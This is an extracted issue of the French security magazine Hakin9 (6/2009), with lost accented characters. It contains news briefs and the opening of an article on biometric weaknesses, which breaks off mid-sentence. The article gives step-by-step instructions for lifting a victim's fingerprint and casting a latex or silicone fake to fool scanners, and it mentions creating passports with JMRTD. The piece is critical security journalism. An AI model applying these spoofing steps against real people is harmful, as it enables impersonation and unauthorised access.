ditorial

MeIlleurs voeux,
loccasion du temps des ftes, rien nest plus agrable que de festoyer avec ceux quon aime. Beaucoup de bonheur, de douceur et de srnit pour la Nouvelle Anne, ainsi que la ralisation des projets les plus chers! Joyeux Nol !
Jakub Borowski, Rdacteur en chef

6/2009 HAKIN9

SOMMAIRE
DOSSIER
12

40

Dveloppement d'outils de scurit rseau sous BSD

Biomtrie rvlez vos donnes

Marcin KosedowsKi Considre comme scurise, la biomtrie ne doit pas constituer la seule et unique protection de donnes. Il est trs facile de tromper les capteurs et d'utiliser les donnes obtenues jusqu' la fin de la vie de la victime. Mme les passeports biomtriques rduisent le niveau de scurit. Les copier est trs simple ; tout le monde est donc capable d'avoir une base de donnes biomtriques.

henri doreau Les systmes BSD sont trs prsents dans le monde de la scurit informatique. Nous allons voir qu'en plus d'tre fiables et efficaces, ils offrent de puissants mcanismes d'injection/rception de paquets. Ces mcanismes sont parfaitement adapts au dveloppement d'outils de scurit et administration rseau. La librairie PCAP apporte cette puissance aux autres systmes Linux, Windows, Solaris...)

BACKUP
46

24

J'ai vos (mta)donnes !

AIDE, Comment surveiller lintgrit de votre systme ?

wojciech sMol Les mtadonnes constituent une sorte d'ADN des documents chiffrs. Regardez comment les cybercriminels sont capables d'utiliser les informations invisibles prsentes dans les fichiers partags publiquement.

FOCUS
32

Le paradoxe du modle FTP

rgis senet Advanced Intrusion Detection Environment ou plus communment appel AIDE est ce que lon appel couramment un HIDS ou encore Host-based Intrusion Detection System. Par dfinition, on appelle IDS (Intrusion Detection System) un mcanisme coutant le trafic rseau de manire furtive afin de reprer des activits anormales ou suspectes et permettant ainsi d'avoir une action de prvention sur les risques d'intrusion. Un HIDS assure la scurit au niveau des htes.

sicchia didier Ds le dbut de la rvolution internet, il devint important de stocker largement des applications, des donnes et des informations sur des supports physiques importants et avec la volont de partager celles-ci selon droits et privilges particuliers. De ce constat, un protocole spcifique fut rflchi et dvelopp, comprendre file transfert protocol . Le service FTP repose sur un protocole simple mais efficace. Nanmoins, il semble particulirement sensible quelques ambiguts qui lui sont propres. Examinons le principe du paradoxe FTP dont la nature s'applique aussi d'autres services.

ATTAQUE
50 Hacker les mots de passe
wojciech sMol Mettre ses esprances dans les garanties mathmatiques de scurit des algorithmes de chiffrage et de protection est trs naf. Tout mot de passe, toute protection peut tre hacke ... ou contourne. Le facteur humain constitue toujours le maillon faible.

PRATIQUE
60

Helix, rponse une intrusion

Pierre therrode Avec l're de l'internet, nous sommes tous conscients d'tre des cibles potentielles pour les pirates. En effet, la criminalit sur le net est de plus en plus prsente dans cette nouvelle perspectives de technologies, les intrusions dans un systme touchant aussi bien les simples utilisateurs que les entreprises. Toutefois, il est possible que de tels agissements puissent tre sauvegards afin de les analyser comme lments de preuves.

 HAKIN9 6/2009

SOMMAIRE
66

Les Centres Oprationnels de Scurit

helMi rais Cet article prsente une vue globale sur les SOC ainsi que les diffrents lments ncessaires sa mise en place.

TEChnIQUE
70

permettant d'assurer la confidentialit des donnes. Ces systmes permettent de chiffrer/dchiffrer les donnes d'un disque dur (ou d'un conteneur) lorsque l'on y accde. Ils sont compltement transparents pour les utilisateurs (except la saisie dun mot de passe). L'utilisation de FDE est aujourd'hui de plus en plus courante, que ce soit par des entreprises ou des particuliers pour assurer la confidentialit des donnes.

A la dcouverte des plateformes de routage scurises CISCO

VARIA
06 En bref
nicolas hily Vous trouverez ici les nouvelles du monde de la scurit des systmes informatiques.

ryan gaMo Cet article recense la plupart des problmatiques lies au routage rseau et la faon de limiter les cas d'abus en utilisant les plateformes Cisco. Chaque cas d'attaque prsent est vridique, certains se sont produits dans des banques qui grent des fonds se chiffrant plusieurs milliards de dollars et dautres se sont limits aux boutiques de petits commerants. Le risque d'attaque sur des rseaux peu ou pas protgs est donc bien rel !

10 Sur le CD-ROM

Nous vous prsentons le contenu et le mode de fonctionnement de la version rcente de notre principale distribution hakin9. Et les applications commerciales

74

LA RAM : Une vulnrabilit avre des FDE

jrMe Bise Les systmes de chiffrement de disque la vol (FDE, on the Fly Disk Encryption) sont des logiciels

82 Dans le prochain numro

Le dossier, les sujets qui paratront dans le numro 1/2010 (41)

6/2009 HAKIN9

EN BREF
LES SOUCIS DE SCURIT PERDURENT SOUS WINDOWS 7
Si vous utilisiez Linux ou Mac, vous n'auriez pas ce problme. En revanche Windows a et sera toujours vulnrable simplement parce que la base, il n'a jamais t conu pour travailler en rseau. Ainsi, les trous de scurit qui existaient sous Windows for Workgroups en 1991, sont toujours prsents en 2009 avec Windows 7. La plupart de ces problmes viennent de l' IPC (spcifiques Windows) (communications inter-processus), ces processus, cres afin que les informations circulent d'un programme un autre, n'ont jamais t conu dans un esprit scuritaire. Windows et les applications pour Windows reposent sur ces procdures pour faire le travail. Au fil des annes, ont t inclus les DLL (bibliothques de liens dynamiques), OCX (Object Linking and Embedding (OLE) Extension Control), et les ActiveX. Peu importe leur nom,elles font le mme genre de travail et sans aucun gard pour la scurit. Pire encore, c'est qu'elles peuvent tre actives par l'utilisateur par des scripts de niveau, tels que des macros Word, ou tout simplement par des programmes de visualisation de donnes, tels les fentre d'affichage de Outlook. Ces IPC peut alors excuter des programmes malveillants et apporter des changements fondamentaux Windows. Les formats de donnes de Microsoft peuvent ainsi tre utilis pour contenir du code de programmation actif. Les Formats Microsoft Office sont couramment utiliss pour transmettre des programmes malveillants. La bureautique de type Microsoft Office est tres bien pour un PC de type autonome, quand vous voulez par exemple que votre Powerpoint communique avec Excel et propage de nouvelles donnes dans le tableur. Mais, cette mme puissance est un trou de scurit permanent pour un PC reli Internet. A la base, Windows, utilise un compte unique et autonome par dfaut qui oblige l'utilisateur excuter des programmes en tant que super administrateur. Microsoft a essay de se dbarrasser de cela, avec des tentatives telles que l'UAC (User Account Control) dans Vista.mais a chou. Mme dans Windows 7, il reste trs facile de contourner toutes les scurit d'un UAC. Microsoft affirme avoir corrig certains bugs ce sujet.

LES HACKERS AIMENT NOEL

La plupart des gens sont occup vers la fin de l'anne l'achat de cadeaux et des soires de fte vers la fin Dcembre, mais les professionnels de la scurit eux ont une obligation supplmentaire: garder les pirates au large de leurs rseaux d'entreprise. La plupart des pros de la scurit savent que les spammeurs et les criminels en ligne lancent leurs campagnes cette poque de l'anne car ils pensent que la probabilit pour que les rseaux soient surveills est plus faible. C'est galement et au meme moment la priode la plus favorable pour les achats en ligne. Selon une tude statistique assez rcente, 56 pour cent jugent que Noel est une priode propice aux attaques et arnaques en tout genres sur le Web, contre 25 pour cent pour la nouvelle anne. La saison des Ftes est donc une priode favorite, simplement parce que les entreprises sont court de personnel et que les employs utilisent leurs jours de vacances afin de prendre du temps avec leur famille respectives. "C'est une priode de l'anne ou les gens font professionnellement parlant beaucoup moins de choses", a dclar Michael Hamelin, architecte en chef de la scurit chez Tufin, base Ramat Gan, en Isral.

GO-LOCALISATION: BIG BROTHER IS WATCHING YOU.

Le mois dernier, les nouvelles au sujet de Twitter concernant la planification sur l'ajout de donnes de localisation grace des API, donnent aux gens la possibilit d'ajouter la longitude et la latitude comme information sur leurs tweets. Il y a eu beaucoup de commentaires ce sujet concernant le pour et le contre, notamment sur le non respect de la vie prive. Oui, la golocalisation peut tre une bonne chose, notamment pour obtenir des informations sur un restaurant,un service particulier proximit, ou mme,
 HAKIN9 6/2009

6/2009 HAKIN9

EN BREF
trouver vos amis pour une nuit dans une ville. La Golocalisation n'est certes pas quelque chose de nouveau,Latitude de Google permet depuis quelque temps travers le Web et l'utilisation de tlphones intelligents de voir o vos amis se trouvent.La dernire version 5 de HTML contient du code pour la golocalisation, mais pas vraiment intgre tous les navigateurs pour le moment. Il existe des services tels que Brightkite.com qui sont des rseaux sociaux avec une connaissance des informations de golocalisation. Mais vos tlphones cellulaires ordinaires diffusent leur emplacement en permanence. Selon Jeff Jonas, environ 600 milliards d'emplacements sont recueillies chaque jour par les utilisateurs de tlphone cellulaire amricain. "Chaque appel, chaque message texte, chaque e-mail et de transfert de donnes" gnre une opration de localisation. Mais la question est la suivante: les transporteurs cellulaires sont t-ils vraiment faits pour transporter toutes ces donnes ? C'est finalement suffisant pour me donner l'envie d'teindre mon tlphone de temps en temps, Ou dfaut, mettre un chapeau en papier d'aluminium par dessus !!! La rponse se trouve sur l'Internet chinois, connu comme :moteur de recherche de chair humaine et qui a d'ailleurs inspir un film local. Sur internet, se pratique la chasse l'homme qui cible le plus souvent des fonctionnaires corrompus ce qui est somme toutes assez courant dans un pays sans libert de la presse. On y dnonce donc,et ce, de manire assez rgulire des scandales concernant par exemple des citoyens ordinaires qui commettent des actes que les internautes considrent comme moralement condamnables. Les utilisateurs du Web chassent des informations personnelles sur leurs victimes, comme les numros de tlphone, adresses, et informations sur l'employeur. Une femme a attir la colre des utilisateurs du Web, car elle a post une vido d'elle-mme la montrant en train d'craser le crane d'un chaton. La femme a finalement t suspendue de son emploi. Des recherches cibles sur plus de 80 fonctionnaires du gouvernement en Chine a entrain l'an dernier, une perte de leur emploi pour au moins trois d'entre eux a dclar Steven Guanpeng Dong, un conseiller en relations avec les mdias pour le Conseil d'Etat de Chine. Un responsable sud de la Chine a perdu son emploi l'an dernier aprs une vido en ligne le montrant en train de molester une jeune fille, qui il demande de le conduire aux toilettes. Mais des scnes de lynchage en ligne de ce type ont aussi suscit un vif dbat public . Finalement, les gens demandent une lgislation pour protger la confidentialit des utilisateurs sur Internet. Les perquisitions en ligne "ne sont pas une bonne faon d'aider la dmocratie en Chine", a indiqu Dong, qui rclame une loi pour rglementer le Web. de confidentialit au cours des 12 prochains mois suite une srie de recommandations de la part du gouvernement canadien. Des controles sont en cours afin de renforcer la confidentialit,et des politiques qui vont avec. Ces changements sont le rsultat d'une coopration directe entre Facebook et le bureau du commissariat de la vie prive du Canada,une coopration qui a dur plus d'un an. Facebook va aussi aller vers les utilisateurs, en les poussant revoir leurs paramtres de confidentialit. Pour les dizaines de milliers d'applications tierces construites pour la plate-forme Facebook, Facebook va commencer exiger le respect d'un nouvel ensemble d'autorisations, en spcifiant le type d'information auxquelles les personnes veulent accder. Un Consentement explicite des utilisateurs finaux sera galement requit avant que leurs donnes et celles de leurs amis soient mises disposition pour des applications externes. Pour les exigences de la vie prive et des nouvelles applications tierces, il faudra compter environ un an car elles impliquent des modifications de la plate-forme API de Facebook (interface de programmation d'application) et des applications elles-mmes. Il sera intressant de voir comment les dveloppeurs de Facebook vont ragir face aux nouvelles normes pour r-quiper les applications et se conformer ces contrles d'accs stricts.

HACKING EN CHINE ET PROBLMES CONCERNANT LA VIE PRIVE

Qu'ont en commun : un enfant agress sexuellement, un responsable gouvernemental et un assassin de chaton ?
 HAKIN9 6/2009

A PROPOS DU RESPECT DE LA VIE PRIVE SUR FACEBOOK

Facebook va renforcer son dveloppement de socio-fonctionnalits et

En Juillet, Facebook a annonc son intention de simplifier ses fonctionnalits de confidentialit, en disant qu'elles taient devenus trop nombreuses et trop compliqus pour les utilisateurs finaux comprendre et appliquer. Sous la pression de Twitter, Facebook est galement en train d'ajouter des paramtres de confidentialit moins restrictifs pour que les utilisateurs finaux rendent une portion de leurs profils public moins complexes et donc plus largement disponibles pour les autres dans et en dehors de Facebook.

UN MALWARE SOUS MAC OSX

Alors que le Malware a longtemps t une gne presque quotidiennement pour Windows, les utilisateurs Mac ont pris l'habitude de ne pas se soucier des logiciels malveillants. Des Menaces surgissent de temps en temps avec par exemple, un cheval de Troie manant de copies pirates du logiciels iWork d'Apple mais la plupart des utilisateurs Mac, de nos jours ne sont probablement pas quips d'un logiciel de protection antivirus. Apple vante dans ses spots publicitaires la rsistance du Mac aux logiciels malveillants notamment et surtout par rapport Windows. Mais avec la sortie de Mac OS X Snow Leopard, Apple a finalement dcid de renforcer subtilement son jeu quand il s'agit de programmes malveillants, tout comme il l'a fait par le pass avec le phishing dans Safari. Pour la

premire fois, l'OS Mac contient un systme intgr qui dtecte des logiciels malveillants et les tentatives pour protger les utilisateurs d'endommager leurs ordinateurs par inadvertance. Comment a marche? Comme Mac OS X 10.4, Apple a intgr un systme de validation de tlchargement de dossier de Quarantaine intgr dans son systme d'exploitation. Sur le premier systme Leopard, cela se manifeste le plus souvent comme une bote de dialogue qui surgit quand un utilisateur a ouvert un fichier qui est tlcharg via Internet ou via Mail, Safari ou iChat. L'avertissement af fich indique quelle est l'application tlcharg,la nature du fichier, d'aprs le site, et quel moment. Il donne l'utilisateur la possibilit de poursuivre l'ouverture du fichier, d'annuler ou d'af ficher la page Web partir de laquelle il a t tlcharg. Dans Snow Leopard, Apple a amlior de dossier de quarantaine pour vrifier aussi les fichiers contre les programmes malveillants connus, s'appuyant sur une liste de dfinitions de logiciels malveillants connus de type : Systme / Bibliothque / Core Ser vices / CoreTypes.bundle / Contents / Resources / XProtect.plist. A ce jour, le fichier ne contient que deux dfinitions: le cheval de Troie OSX.RSPlug dcouvert en 2007 et les logiciels malveillants OSX.iSer vice incorpors dans le programme d'installation pirates iWork. Toutefois, Apple Macworld prcise que la liste des dfinitions peuvent tre mis jour via Software Update.

LES NOUVEAUTES DE WINDOWS 7

Voici quelques-unes des principales nouveauts disponibles sous Windows 7: l'action Center ou Centre de scurit founit via Windows XP, a t amlior sous Windows 7 et largit la porte des informations fournies.

Windows 7 Action Center fournit dsormais un one-stop-shopping afin de visualiser l'tat du systme un instant t donn et donne de fait un indicatif sur les ventuelles actions correctives mener. Windows 7 fournit un support natif pour la lecture et l'criture sur les disques Blu-ray, Blu-ray tant devenu le standard sur le march. Windows 7 comprend une fonctionnalit appele stade de priphriques afin de simplifier les processus d'installation.Le Device Stage propose une console unique pour grer des priphriques comme les imprimantes, les webcams et les tlphones mobiles. Device Stage peut tre personnalise par le constructeur de votre appareil, ainsi, l'information et les fonctionnalits disponibles pour un priphrique donn varient d'un constructeur l'autre. BitLocker-to-Go: Microsoft a introduit BitLocker Disk Encr yption dans Windows Vista,mais La version initiale ne peut chiffrer le volume du disque qui hberge le systme d'exploitation de Windows,avec le Ser vice Pack 1 ,Microsoft a amlior BitLocker de sorte que d'autres lecteurs et volumes sur le systme pourrait tre galement protgs. Avec Windows 7 BitLocker va un peu plus loin en ajoutant BitLocker-to-Go pour le cr yptage de donnes sur les cls USB et autres supports amovibles.

Rdig paR Nicolas HilY

6/2009 HAKIN9

SUR LE CD
CD-ROM hakin9.live
Sequrit est une entreprise qui a t fonde par le clbre expert en scurit informatique : Wayne Burke. Il a su apporter une rponse concrte un problme rcurrent : Comment se tenir inform de l'volution constante du secteur de la scurit informatique ? Pour rester inform sur les dernires technologies, les menaces et les solutions, le spcialiste en scurit informatique doit consacrer une grande partie de son temps rechercher et analyser plusieurs sources d'informations. On comprend aisment que ce travail fastidieux laisse peu de temps au maintien de la scurit d'un environnement informatique !

ous avons regroup sur ce CD les meilleures solutions de formation, des applications commerciales et autres goodies produits par Sequrit.org sous la direction de Wayne Burke.

d'acqurir une exprience pratique ainsi que des connaissances approfondies sur les systmes de scurit actuels. Les cours : Introduction, LMS, CEHv6 Pen Testing 101, CEHv6 Footprinting, CEHv6 Scanning, CEHv6 Enumeration,

hakin9) pour consulter des cours gratuits LMS (plateformes d'e-learning). Les cours LMS comprennent : Moteur de test. Didacticiels. Vidos. Outils pour les blogs. Forums. Tchats. Etc.

Hacking tHique et test d'intrusion (pen-testing)

Cette formation vous plongera dans un environnement interactif o vous verrez comment scanner, tester, hacker et scuriser vos propres systmes. Cet environnement de test vous permettra

Vous pouvez galement vous inscrire sur le site de Sequrit (http://www.sequrit.org/

10 HAKIN9 6/2009

hakin9.live

Sil vous est impossible de lire le CD. et que ce dernier nest pas endommag physiquement, essayez de lire dans au moins 2 lecteurs diffrents.

En cas de problme avec votre CD, envoyez-nous un message ladresse suivante : cd@hakin9.org

6/2008 HAKIN9

11

DOSSIER
Marcin KosedowsKi

Biomtrie

rvlez vos donnes

Degr de difficult

considre comme scurise, la biomtrie ne doit pas constituer la seule et unique protection de donnes. il est trs facile de tromper les capteurs et d'utiliser les donnes obtenues jusqu' la fin de la vie de la victime. Mme les passeports biomtriques rduisent le niveau de scurit. Les copier est trs simple ; tout le monde est donc capable d'avoir une base de donnes biomtriques.

a biomtrie est un art d'analyser les tres vivants. Dans le cas des personnes, il est particulirement populaire d'analyser des caractristiques telles que l'empreinte digitale, la gomtrie de visage, la structure de l'iris de l'oeil, la manire de bouger ou la voix. La biomtrie est utilise dans l'anthropologie, la mdecine, la criminologie et des fins d'autorisation. Les premires informations relatives la dtermination de l'identit d'aprs la comparaison des empreintes digitales remontent au 16me sicle. Plus tt, en Grce et Rome antiques, les fondations des mthodes biomtriques actuelles ont t poses. Mais ce n'est qu'aujourd'hui, grce au progrs de la technique de transformation des signaux, que nous russissons analyser et stocker des informations biomtriques de manire efficace et grande chelle.

Cet artiCle explique

comment la biomtrie facilite les attaques, comment le sourire influence votre anonymat, comment elvis a obtenu un passeport hollandais.

Scurit officielle seulement

Ce qu'il faut Savoir

Mthodes typiques de protection d'accs aux donnes, notion gnrale de transformation des signaux. 12 HAKIN9 6/2009

Les systmes bass sur la biomtrie sont prsents par les fabricants comme pratiques, infaillibles et plus srs par rapport aux mthodes traditionnelles (mots de passe, cls, jetons). De plus, ce type d'outils n'est pas trs connu des attaquants potentiels et il donne l'impression de modernit aux clients et partenaires, ce qui en fait une trs bonne solution. Malheureusement, toutes les informations relatives la biomtrie ne sont pas vraies et les outils ne sont pas infaillibles. Les fabricants avouent officieusement que les

systmes biomtriques ne doivent pas tre utiliss de manire individuelle. Le scanneur peut tre tromp par les mthodes dont vous parlez. Le systme ne sera sr que lorsqu'il sera pourvu d'une carte et d'un clavier pour saisir un mot de passe dit un ingnieur anonyme d'une socit polonaise proposant des capteurs biomtriques. Selon les tudes d'Aberdeen Group du 2008, la mthode standard - utilisation des mots de passe - est employe par 52 % de socits pour protger les donnes critiques. Ses dfauts sont les suivants : soit les mots de passe sont trop simples soit les employs les utilisent d'une manire incorrecte (le mme mot de passe pour plusieurs services, enregistrement des informations, partage avec les collgues). L'identification par une empreinte digitale limine le problme li au fait de retenir les informations et le nombre d'informations mesures garantit en thorie une plus grande scurit qu'un mot de passe complexe. Il est admis qu'une empreinte digitale correspond une chane de 200 caractres. En pratique, tout cela est diffrent. Obtenir une empreinte digitale ne pose en effet aucun problme et il est trs facile de tromper les capteurs. Les cls et les jetons constituent aussi une mthode populaire. Malheureusement, ce type d'outils peut tre perdu, dtruit ou vol et transmettre rapidement une copie peut tre difficile. Perdre un oeil ou un doigt est moins probable. Comme vous pouvez le constater,

BIomtrIe
la biomtrie est trs pratique d'emploi : pas de mots de passe retenir ni de jetons porter. Il pourrait sembler que la biomtrie est une manire parfaite pour protger l'accs aux donnes mais la ralit n'est pas si rose comme le prsentent les fabricants d'quipements. Le problme de base se trouve dans la basse prcision des appareils d'analyse. Il est possible de tromper la plupart de capteurs de lignes papillaires disponibles sur le march par un moyen fait maison. Il sera prsent dans la suite de l'article. De plus, les empreintes digitales peuvent changer suite par exemple des blessures profondes, ce qui peut mener aux erreurs. Les logiciels d'analyse de visages ou de manire de marcher ne sont pas prcis. Ils ne reconnaissent ni les personnes retournes ni mal claires, ce qui constitue un dfaut en cas de traitement d'images, ni les personnes qui sourient ou portent des lunettes.

vous pouvez changer votre mot de passe mais pas votre oeil

Ces dfauts seront srement corrigs. Il est toujours possible de concevoir un capteur plus prcis, et donc plus cher, et modifier les algorithmes de reconnaissance de visages. L'un des plus grands dfauts des systmes biomtriques est leur principe de base : les caractristiques mesures ne changent pas. En cas de mots de passe et de jetons, il est recommand de les modifier trs frquemment (respectivement toutes les plusieurs semaines et minutes). Cette dmarche a pour but de prvenir les situations o un attaquant vole un mot de passe et s'en sert pendant trs longtemps. Si toutefois, il russit copier une empreinte digitale ou une photo de l'iris de l'oeil, il pourra accder toutes les donnes ainsi autorises pendant toute la vie de l'utilisateur qui il les a vols. Actuellement, copier les protections plus avances, telles que structure de veines dans la main, semble peu probable mais ce risque peut devenir rel dans l'avenir. Raliser une copie des lignes

Figure 1. La biomtrie facilite l'accs aux donnes mais rduit la scurit du systme. La photo prsente un passeport biomtrique d'Elvis Presley. La photo provient du site os3.nl

Figure 2. Le programme JMRTD gratuit permet de crer notre propre passeport. L'application gnre elle-mme tous les fichiers ncessaires.
6/2009 HAKIN9 13

DOSSIER
Autres mthodes biomtriques
Les bons rsultats sont obtenus par les tudes sur le comportement des personnes. Au lieu d'analyser les mouvements du corps, on tudie les comportements. Cette solution rend impossible par exemple de couper le doigt de la victime. Les laboratoires KDDI R&D ont cr un programme qui, d'aprs une analyse de manipulation d'un tlphone portable, dfinit si l'utilisateur est son propritaire. L'efficacit du systme approche apparemment 96 %. Une autre mthode consiste observer la manire de bouger et cligner les yeux. L'une des manires les plus efficaces consiste analyser la faon d'crire sur le clavier. Les distances entre les lettres saisies sont mesures. Cela ne ncessite pas de connatre la langue du texte saisi, les distances entre les caractres suffiront. Malheureusement, cette mthode sera inefficace si le systme n'est pas constamment mis jour (l'utilisateur peut apprendre crire plus rapidement) et si la personne est analphabte. Une manire plus avance consiste mesurer l'onde P300, qui est une rponse individuelle de chacun d'entre nous du cerveau une stimulation. Une autre mthode consiste vrifier la structure des veines sur la poigne : elle a toutes les qualits d'une empreinte digitale mais falsifier les veines est quasiment impossible et la main ne peut pas tre morte car le sang ne circulerait plus.

papillaires ou enregistrer une voix n'est pas toutefois la porte de tout le monde. Les scanneurs d'oeil ou de visage bas march peuvent galement tre tromps si nous leur prsentons une photo une grande rsolution. Ces protections doivent donc tre considres comme insuffisantes si elles sont employes individuellement. Les scanneurs d'oeil, bass sur les micromouvements de la pupille et non sur une image statique, offrent des protections de base. Leurs concepteurs ont galement russi se protger contre l'enregistrement de l'oeil et la lecture du film : les capteurs reconnatront si l'objet est trois dimensions. De plus, cette solution protge contre les personnes qui voudraient utiliser un oeil d'un dfunt. L'oeil arrte de bouger quelques secondes aprs la mort (ou une fois enlev du corps) et donc l'oeil dcoup ne suffira pas obtenir une autorisation. Le propritaire vivant doit tre sur place. Un problme important est li au fait qu'aucune caractristique analyse ne peut tre utilise pour tous les habitants de la terre. Les personnes sans mains sont dpourvues d'empreintes digitales, les muets ne peuvent pas faire une autorisation avec leur voix et comme les femmes dans la culture arabe cachent leur visage, il est impossible d'utiliser la gomtrie du visage. Il faut en plus penser aux incidents, comme amputation d'une main ou arthrite qui modifie la gomtrie de la main. Mme l'ADN ne permet pas d'tre sr 100 % : en effet, les jumeaux monozygotes ont le mme ADN. De plus, cette mthode n'est
14 HAKIN9 6/2009

pas passive et ncessite de prlever des chantillons sur plusieurs endroits.

Scanneurs o se trouve l'erreur ?

Reconnatre une empreinte digitale consiste collecter des points caractristiques et les enregistrer dans une base de donnes. Au prochain scan, ces caractristiques sont compares aux modles dans la base. Dans la plupart de cas, l'image entire n'est pas stocke et les caractristiques enregistres du doigt sont en plus chiffres. Ce point concerne en particulier les appareils bon march qui doivent changer les donnes avec l'ordinateur. Afin d'viter que les donnes soient interceptes, on utilise une transmission code. Pour faciliter la reconnaissance, le scanneur effectue d'autres oprations (dilatation, rosion).

La recherche est facilite par le fait que les empreintes peuvent tre divises en six groupes principaux. Cela ne suffit pas l'identification mais d'autres caractristiques sont aussi faciles trouver. Il faut notamment vrifier les emplacements de crtes et de valles sur la peau. Chaque doigt est pourvu de plusieurs dizaines de points de ce type. Chaque point est en gnral dcrit sur 9 bits mais tous ne peuvent pas tre utiliss par le scanneur. Il s'agit gnralement de plusieurs points, ce qui donne une cl de 100 bits. Ce nombre est suffisant pour dmarrer une cafetire mais pour des oprations ncessitant une plus grande prcision, il est ncessaire de vrifier plusieurs voire tous les doigts. Nous obtenons ainsi 1024 bits qui caractrisent la main. D'autres mthodes permettant d'obtenir des cls plus longues sont connues, par exemple, utiliser des fichiers au lieu des cls. Comme vous pouvez le constater, c'est une protection supplmentaire qui facilite la vie mais n'augmente aucunement le niveau de la protection. Il faut faire attention un dtail dans le fonctionnement des scanneurs. Comme ils peuvent se tromper, nous apportons une tolrance au bruit. Les tudes menes dans l'Ecole Polytechnique de Wroclaw ont dmontr que les capteurs, auxquels on a prsent une image prpare avec un bruit gale 5 %; fonctionnaient mieux que les capteurs qui scannaient plusieurs fois la mme empreinte (ressemblance

Que le passeport, contient-il ?

Les informations dans le passeport se trouvent au maximum dans 17 fichiers, dont entre 4 et 6 sont utiliss actuellement en fonction du pays. Les autres donnes, en particulier, les donnes qui servent protger contre les copies, sont ignores. Les fichiers sont enregistrs sous forme binaire mais ils ne sont pas chiffrs : EF.DG1 le fichier contient des donnes personnelles de l'utilisateur, sa nationalit et le pays metteur du passeport. Le fichier est obligatoire. EF.DG2 la photo enregistre au format JPG ou JPG200, obligatoire. EF.DG3 une donne biomtrique supplmentaire ; il s'agit actuellement (si le fichier est utilis) d'une empreinte digitale. Le fichier est optionnel. EF.DG4-14 l'emplacement pour d'autres donnes biomtriques, actuellement non utilis. EF.DG15 le fichier permet de cloner. Il n'est utilis que dans les passeports mis par l'Australie, le Canada, la Nouvelle-Zlande, le Japon et le Singapour. EF.SOD le fichier garantit l'intgrit des autres fichiers. Il est obligatoire et gnr automatiquement par le programme JMRTD. EF.COM l'index obligatoire de tous les fichiers. Gnr par le programme.

BIomtrIe
d'environ 80 % dans les images avec bruit et 75 % dans les images sans bruit). De plus, la comparaison de deux empreintes compltement diffrentes pourrait donner une ressemblance d'environ 20 %. Un autre problme est pos par le fait que les doigts peuvent tre sales, avoir des cicatrices ou des lignes papillaires effaces (elles s'effacent avec l'ge ou suite un travail physique). Les lignes papillaires des doigts des fumeurs sont galement moins claires que des non-fumeurs. Ces tudes dmontrent qu'un capteur doit avoir une trs grande tolrance aux erreurs pour tre utile. Si une ressemblance minimale d'un doigt dans cette base s'levait par exemple 95 %, une partie de personnes ne pourrait pas du tout se servir de ce systme et d'autres devraient effectuer plusieurs scans pour obtenir une autorisation. Comme vous pouvez facilement le deviner, des circuits bon march installs dans les pendrives ou les ordinateurs portables se caractrisent par une moindre prcision. Seule la performance des outils professionnels est plus leve, suprieure 99 %. Leur dfaut, c'est leur prix. Il ne faut pas toujours le prendre en compte car la manire d'effectuer des tests est inconnue et aucun standard n'existe pour l'instant pour dfinir la performance des scanneurs. Il est possible de se servir de cette grande tolrance aux erreurs des capteurs bon march des lignes papillaires pour effectuer une attaque. Dans la plupart des appareils utiliss, le capteur d'analyse est un simple scanneur quip d'un filtre et d'un ensemble de lentilles. Aprs qu'un doigt est pos, l'appareil prend sa photo, traite l'image, trouve des caractristiques et les compare la base. La manire de transmettre et de stocker les donnes n'est pas importante car nous effectuerons l'attaque plus rapidement sur le scanneur. Il s'avre qu'un doigt artificiel, autrement dit, un morceau plat de latex; de silicone ou autre matriau semblable avec l'empreinte digitale dessus, fait ouvrir efficacement toutes les serrures utilises. Faire une copie de ce type est particulirement simple.

Figure 3. Les capteurs ne peuvent pas assurer que l'analyse sera toujours identique et les erreurs peuvent tre trop grandes

Figure 4. La biomtrie n'est en grande partie qu'un marketing. Les personnes qui pensent qu'elle peut constituer une super protection seront srement dues. Le schma provient du site biometria.pl

Crer un doigt artificiel

La premire tape consiste trouver l'objet sur lequel la victime a laiss son empreinte digitale. Bien que cette tape semble difficile, ce n'est pas le cas. Il est trs facile de prlever une empreinte sur le botier ou l'cran d'ordinateur portable, sur un verre, un tlphone ou autres objets plats touchs par le bout du doigt. Aprs la mise en place des documents biomtriques en Allemagne, on a parl beaucoup d'une opration du mois d'avril 2008 o un groupe Chaos Computer Club a prsent des empreintes digitales du ministre de l'Intrieur, Wolfgang Schuble. S'il est

possible de trouver les empreintes digitales d'un ministre, il est d'autant plus facile de trouver des empreintes de n'importe quelle autre personne. L'tape suivante consiste prlever l'empreinte. Si elle bien visible (par exemple, elle se trouve sur le botier d'ordinateur), il suffit de la prendre en photo et la traiter dans un programme graphique. Dans le cas contraire, il faut passer une couche de poudre sur la surface avec l'empreinte et supprimer le surplus de poudre avec un pinceau dlicat. Cette opration est ncessaire lorsque nous prlevons l'empreinte sur
6/2009 HAKIN9 15

DOSSIER
une surface transparente, comme un verre. Le traitement graphique consiste augmenter le contraste, largir l'histogramme et effectuer d'autres oprations pour rendre l'image claire, noire et blanche. Une fois cette tape termine, nous devrons obtenir des lignes noires la place des valles et un fond transparent la place des crtes, comme sur la Figure prsentant l'empreinte digitale de Wolfgang Schuble. Nous imprimons l'image obtenue sur une feuille transparente (utilise, par exemple, par les projecteurs) l'aide d'une imprimante laser. Nous pouvons le faire dans une socit de photocopies. En cas de besoin, il faut corriger les lignes qui n'ont pas t bien imprimes, l'aide d'un marqueur. L'tape suivante consiste mettre un latex ou une silicone liquide ou bien autre matriau de ce type sur son propre doigt et faire une nouvelle empreinte. Les traces laisses par le tonner fonctionneront comme un tampon. Cette opration suffira pour traverser les protections utilises dans la plupart (plus de 90 %, d'aprs Stephanie C. Schucker) de scanneurs disponibles sur le march. Dans le cas de certains outils, il n'est mme pas ncessaire d'imprimer l'empreinte sur une feuille transparente. Il suffit de mettre une simple feuille de papier sur le scanneur d'impression ! Les capteurs d'une meilleure qualit et les capteurs qui fonctionnent comme des scanneurs sont en plus capables de dtecter des reliefs, une simple impression ne suffira donc pas. la place, il faut raliser un plateau en latex bomb d'aprs la photo pour faire semblant de la peau de la victime. Il est possible de le faire l'aide du laser utilis par les dentistes d'aprs l'impression sur la feuille transparente. Le mme dessin, ralis auparavant, sera ncessaire pour l'outil. Cette mthode, bien que plus difficile que l'impression, peut toujours tre ralise sans problme. Son efficacit a t confirme dans un programme Myth Busters (le lien cet pisode se trouve dans l'encadr) sur la chane Discovery Channel. Optel dmontrent en revanche qu'il est possible de tromper ce type de capteurs (utiliss notamment dans les aroports amricains) avec un doigt mort ou un moulage. Les fabricants affirment qu'il est impossible de tromper leur appareil par les mthodes 